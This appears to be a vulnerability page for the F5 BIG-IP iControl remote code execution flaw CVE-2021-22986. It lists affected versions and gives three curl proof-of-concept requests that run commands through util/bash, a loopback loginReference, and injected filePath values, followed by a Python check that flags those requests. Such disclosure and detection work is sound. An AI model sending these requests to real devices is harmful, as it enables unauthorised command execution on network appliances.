# CVE-2021-22986 F5 BIG-IP iControl RCE Vulnerability
* Execute arbitrary system commands
* Create or delete files
* Disable services

| Product | Branch | Vulnerable versions | Fixed in |
|---|---|---|---|
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 16.x | 16.0.0 – 16.0.1 | 16.0.1.1 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 15.x | 15.1.0 – 15.1.2 | 15.1.2.1 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 14.x | 14.1.0 – 14.1.3 | 14.1.4 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 13.x | 13.1.0 – 13.1.3 | 13.1.3.6 |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 12.x | 12.1.0 – 12.1.5 | 12.1.5.3* |
| BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) | 11.x | None | Not applicable |
| BIG-IQ Centralized Management | 8.x | None | 8.0.0 |
| BIG-IQ Centralized Management | 7.x | 7.1.0, 7.0.0 | 7.1.0.3, 7.0.0.2 |
| BIG-IQ Centralized Management | 6.x | 6.0.0 – 6.1.0 | None |

==POC==
1.
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
2.
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'
3.
curl -ksu admin:[redacted] https://[victimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
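
A defender-side check that flags the three request shapes listed above when they appear in captured management-plane requests. This is an added example, not part of the original page or any F5 tooling. The record layout (`path`, `auth`, `body`), the sample records, and the rule that a legitimate `filePath` is a plain absolute path are assumptions.

```python
import base64, json, re
from urllib.parse import urlparse

SHELL_META = re.compile(r"[`$;|&<>]")
LOGIN = "/mgmt/shared/authn/login"
BUNDLE = "/mgmt/tm/access/bundle-install-tasks"

def empty_basic_password(auth):
    """True when a Basic Authorization header has a user name but no password."""
    if not auth or not auth.lower().startswith("basic "):
        return False
    try:
        user, _, password = base64.b64decode(auth[6:]).decode().partition(":")
    except ValueError:  # malformed base64 or non-UTF-8 credentials
        return False
    return bool(user) and password == ""

def basic(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

def inspect(req):
    """Return findings for one request record (dict with path, auth, body)."""
    findings = []
    path = urlparse(req["path"]).path.rstrip("/")
    try:
        body = json.loads(req.get("body") or "{}")
    except ValueError:
        body = {}
    body = body if isinstance(body, dict) else {}
    if path == "/mgmt/tm/util/bash" and empty_basic_password(req.get("auth")):
        findings.append("util/bash with empty Basic password")
    ref = body.get("loginReference")
    link = ref.get("link") if isinstance(ref, dict) else None
    if path == LOGIN and isinstance(link, str) and urlparse(link).hostname in ("localhost", "127.0.0.1"):
        findings.append("loginReference targets loopback")
    fp = body.get("filePath")  # assumption: legitimate values are plain absolute paths
    if path in (LOGIN, BUNDLE) and isinstance(fp, str) and (SHELL_META.search(fp) or not fp.startswith("/")):
        findings.append("filePath is not a plain absolute path")
    return findings

# Constructed records: the three request shapes above plus one benign call.
SAMPLES = [
    {"path": "/mgmt/tm/util/bash", "auth": basic("admin", ""), "body": '{"command":"run","utilCmdArgs":"-c id"}'},
    {"path": LOGIN, "auth": None, "body": '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'},
    {"path": BUNDLE, "auth": basic("admin", "constructed-pw"), "body": '{"filePath":"id"}'},
    {"path": BUNDLE, "auth": basic("admin", "constructed-pw"), "body": '{"filePath":"/var/tmp/example.conf"}'},
]
if __name__ == "__main__":
    print([inspect(r) for r in SAMPLES])
```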